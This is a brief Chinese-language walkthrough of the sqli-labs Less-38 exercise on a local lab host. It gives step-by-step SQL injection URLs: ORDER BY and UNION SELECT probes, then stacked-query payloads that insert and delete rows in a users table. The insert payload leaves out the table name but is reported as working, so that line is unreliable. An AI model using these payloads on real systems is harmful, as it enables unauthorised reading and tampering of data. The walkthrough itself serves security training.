sql_lab之sqli中的堆叠型注入(less-38)
堆叠注入(less-38)
1.判断注入类型
http://127.0.0.3/less-38/?id=1' and 1=2 -- s 没有回显
http://127.0.0.3/less-38/?id=1' and 1=1 -- s 有回显
则说明是单字节’注入
2.查询字段数
http://127.0.0.3/less-38/?id=1' order by 4 -- s 报错
http://127.0.0.3/less-38/?id=1' order by 3 -- s 有回显
说明字段数为3
3.判断回显点
http://127.0.0.3/less-38/?id=-1' union select 1,2,3 -- s
4.查询数据库
http://127.0.0.3/less-38/?id=-1' union select 1,database(),3 -- s
接下来的步骤可以用联合查询进行查询
堆叠注入攻击
(1)在users表中添加一个用户
http://127.0.0.3/less-38/?id=1'; insert into values(17,'gao','a123456') -- s
证明添加成功
(2)在users表中删除一个用户
http://127.0.0.3/less-38/?id=1';delete from users where users.username='gao' -- s
表中没有gao这个用户,说明删除成功